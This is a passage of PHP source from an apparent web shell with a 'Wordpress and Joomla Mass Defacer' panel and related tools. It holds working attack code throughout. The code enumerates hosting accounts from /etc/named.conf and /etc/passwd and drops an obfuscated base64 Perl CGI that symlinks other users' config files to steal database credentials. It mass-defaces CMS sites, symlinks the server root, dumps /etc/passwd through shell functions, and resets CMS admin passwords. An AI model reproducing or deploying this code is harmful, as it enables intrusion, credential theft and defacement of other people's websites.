$_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
819 NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
820 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
821 G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
822 YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
823 kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
824 B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
825 kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
826 VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
827 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
828 cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
829 MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
830 R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
831 }
832} elseif($_GET['do'] == 'symser'){
833$d0mains = @file("/etc/named.conf");
834if($d0mains){@mkdir("/3c",0777);@chdir("/3c");@exe("ln -s / root");$file3 = 'Options all
835DirectoryIndex Sux.html
836AddType text/plain .php
837AddHandler server-parsed .php
838AddType text/plain .html
839AddHandler txt .html
840Require None
841Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all
842 DirectoryIndex Sux.html
843 AddType text/plain .php
844 AddHandler server-parsed .php
845 AddType text/plain .html
846 AddHandler txt .html
847 Require None
848 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
849 DirectoryIndex Sux.html
850 AddType text/plain .php
851 AddHandler server-parsed .php
852 AddType text/plain .html
853 AddHandler txt .html
854 Require None
855 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}}
856 elseif($_GET['do'] == 'jumping') {
857 $i = 0;
858 echo "<div class='margin: 5px auto;'>";
859 if(preg_match("/hsphere/", $dir)) {
860 $urls = explode("\r\n", $_POST['url']);
861 if(isset($_POST['jump'])) {
862 echo "<pre>";
863 foreach($urls as $url) {
864 $url = str_replace(array("http://","www."), "", strtolower($url));
865 $etc = "/etc/passwd";
866 $f = fopen($etc,"r");
867 while($gets = fgets($f)) {
868 $pecah = explode(":", $gets);
869 $user = $pecah[0];
870 $dir_user = "/hsphere/local/home/$user";
871 if(is_dir($dir_user) === true) {
872 $url_user = $dir_user."/".$url;
873 if(is_readable($url_user)) {
874 $i++;
875 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz=3xcr3w&folder=$url_user'><font color=gold>$url_user</font></a>";
876 if(is_writable($url_user)) {
877 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz=3xcr3w&folder=$url_user'><font color=gold>$url_user</font></a>";
878 }
879 echo $jrw."<br>";
880 }
881 }
882 }
883 }
884 if($i == 0) {
885 } else {
886 echo "<br>Total ada ".$i." Kamar di ".$ip;
887 }
888 echo "</pre>";
889 } else {
890 echo '<center>
891 <form method="post">
892 List Domains: <br>
893 <textarea name="url" style="width: 500px; height: 250px;">';
894 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
895 while($getss = fgets($fp)) {
896 echo $getss;
897 }
898 echo '</textarea><br>
899 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
900 </form></center>';
901 }
902 } elseif(preg_match("/vhosts/", $dir)) {
903 $urls = explode("\r\n", $_POST['url']);
904 if(isset($_POST['jump'])) {
905 echo "<pre>";
906 foreach($urls as $url) {
907 $web_vh = "/var/www/vhosts/$url/httpdocs";
908 if(is_dir($web_vh) === true) {
909 if(is_readable($web_vh)) {
910 $i++;
911 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz=3xcr3w&folder=$web_vh'><font color=gold>$web_vh</font></a>";
912 if(is_writable($web_vh)) {
913 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz=3xcr3w&folder=$web_vh'><font color=gold>$web_vh</font></a>";
914 }
915 echo $jrw."<br>";
916 }
917 }
918 }
919 if($i == 0) {
920 } else {
921 echo "<br>Total ada ".$i." Kamar di ".$ip;
922 }
923 echo "</pre>";
924 } else {
925 echo '<center>
926 <form method="post">
927 List Domains: <br>
928 <textarea name="url" style="width: 500px; height: 250px;">';
929 bing("ip:$ip");
930 echo '</textarea><br>
931 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
932 </form></center>';
933 }
934 } else {
935 echo "<pre>";
936 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
937 while($passwd = fgets($etc)) {
938 if($passwd == '' || !$etc) {
939 echo "<font color=red>Can't read /etc/passwd</font>";
940 } else {
941 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
942 foreach($user_jumping[1] as $user_ec_jump) {
943 $user_jumping_dir = "/home/$user_ec_jump/public_html";
944 if(is_readable($user_jumping_dir)) {
945 $i++;
946 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz=3xcr3w&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
947 if(is_writable($user_jumping_dir)) {
948 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz=3xcr3w&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
949 }
950 echo $jrw;
951 if(function_exists('posix_getpwuid')) {
952 $domain_jump = file_get_contents("/etc/named.conf");
953 if($domain_jump == '') {
954 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
955 } else {
956 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
957 foreach($domains_jump[1] as $dj) {
958 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
959 $user_jumping_url = $user_jumping_url['name'];
960 if($user_jumping_url == $user_ec_jump) {
961 echo " => ( <u>$dj</u> )<br>";
962 break;
963 }
964 }
965 }
966 } else {
967 echo "<br>";
968 }
969 }
970 }
971 }
972 }
973 if($i == 0) {
974 } else {
975 echo "<br>Total ada ".$i." Kamar di ".$ip;
976 }
977 echo "</pre>";
978 }
979 echo "</div>";
980} elseif($_GET['do'] == 'etcpler'){
981 echo "<center><div class=mybox>Bypass etc/passw With:<br>
982<table style='width:50%' align='center'>
983 <tr>
984 <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
985 <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
986 <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
987 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
988 <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
989</tr></table><center>Bypass User With : <table style='width:50%' align='center'>
990<tr>
991 <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
992 <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
993 <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
994 <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
995 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
996</tr>
997</table></div></center><br>";
998 if ($_POST['awkuser']) {
999echo"<textarea class='inputzbut' cols='65' rows='15'>";
1000echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
1001echo "</textarea><br>";
1002}
1003if ($_POST['systuser']) {
1004echo"<textarea class='inputzbut' cols='65' rows='15'>";
1005echo system("ls /var/mail");
1006echo "</textarea><br>";
1007}
1008if ($_POST['passthuser']) {
1009echo"<textarea class='inputzbut' cols='65' rows='15'>";
1010echo passthru("ls /var/mail");
1011echo "</textarea><br>";
1012}
1013if ($_POST['exuser']) {
1014echo"<textarea class='inputzbut' cols='65' rows='15'>";
1015echo exec("ls /var/mail");
1016echo "</textarea><br>";
1017}
1018if ($_POST['shexuser']) {
1019echo"<textarea class='inputzbut' cols='65' rows='15'>";
1020echo shell_exec("ls /var/mail");
1021echo "</textarea><br>";
1022}
1023if($_POST['syst'])
1024{
1025echo"<textarea class='inputz' cols='65' rows='15'>";
1026echo system("cat /etc/passwd");
1027echo"</textarea><br><br><b></b><br>";
1028}
1029if($_POST['passth'])
1030{
1031echo"<textarea class='inputz' cols='65' rows='15'>";
1032echo passthru("cat /etc/passwd");
1033echo"</textarea><br><br><b></b><br>";
1034}
1035if($_POST['ex'])
1036{
1037echo"<textarea class='inputz' cols='65' rows='15'>";
1038echo exec("cat /etc/passwd");
1039echo"</textarea><br><br><b></b><br>";
1040}
1041if($_POST['shex'])
1042{
1043echo"<textarea class='inputz' cols='65' rows='15'>";
1044echo shell_exec("cat /etc/passwd");
1045echo"</textarea><br><br><b></b><br>";
1046}
1047echo '<center>';
1048if($_POST['melex'])
1049{
1050echo"<textarea class='inputz' cols='65' rows='15'>";
1051for($uid=0;$uid<60000;$uid++){
1052$ara = posix_getpwuid($uid);
1053if (!empty($ara)) {
1054while (list ($key, $val) = each($ara)){
1055print "$val:";
1056}
1057print "\n";
1058}
1059}
1060echo"</textarea><br><br>";
1061}
1062} elseif($_GET['do'] == 'auto_edit_user') {
1063 if($_POST['hajar']) {
1064 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1065 echo "username atau password harus lebih dari 6 karakter";
1066 } else {
1067 $user_baru = $_POST['user_baru'];
1068 $pass_baru = md5($_POST['pass_baru']);
1069 $conf = $_POST['config_dir'];
1070 $scan_conf = scandir($conf);
1071 foreach($scan_conf as $file_conf) {
1072 if(!is_file("$conf/$file_conf")) continue;
1073 $config = file_get_contents("$conf/$file_conf");
1074 if(preg_match("/JConfig|joomla/",$config)) {
1075 $dbhost = ambilkata($config,"host = '","'");
1076 $dbuser = ambilkata($config,"user = '","'");
1077 $dbpass = ambilkata($config,"password = '","'");
1078 $dbname = ambilkata($config,"db = '","'");
1079 $dbprefix = ambilkata($config,"dbprefix = '","'");
1080 $prefix = $dbprefix."users";
1081 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1082 $db = mysql_select_db($dbname);
1083 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1084 $result = mysql_fetch_array($q);
1085 $id = $result['id'];
1086 $site = ambilkata($config,"sitename = '","'");
1087 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1088 echo "Config => ".$file_conf."<br>";
1089 echo "CMS => Joomla<br>";
1090 if($site == '') {
1091 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1092 } else {
1093 echo "Sitename => $site<br>";
1094 }
1095 if(!$update OR !$conn OR !$db) {
1096 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1097 } else {
1098 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1099 }
1100 mysql_close($conn);
1101 } elseif(preg_match("/WordPress/",$config)) {
1102 $dbhost = ambilkata($config,"DB_HOST', '","'");
1103 $dbuser = ambilkata($config,"DB_USER', '","'");
1104 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1105 $dbname = ambilkata($config,"DB_NAME', '","'");
1106 $dbprefix = ambilkata($config,"table_prefix = '","'");
1107 $prefix = $dbprefix."users";
1108 $option = $dbprefix."options";
1109 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1110 $db = mysql_select_db($dbname);
1111 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1112 $result = mysql_fetch_array($q);
1113 $id = $result[ID];
1114 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1115 $result2 = mysql_fetch_array($q2);
1116 $target = $result2[option_value];
1117 if($target == '') {
1118 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1119 } else {
1120 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1121 }
1122 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1123 echo "Config => ".$file_conf."<br>";
1124 echo "CMS => Wordpress<br>";
1125 echo $url_target;
1126 if(!$update OR !$conn OR !$db) {
1127 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1128 } else {
1129 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1130 }
1131 mysql_close($conn);
1132 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1133 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1134 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1135 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1136 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1137 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1138 $prefix = $dbprefix."admin_user";
1139 $option = $dbprefix."core_config_data";
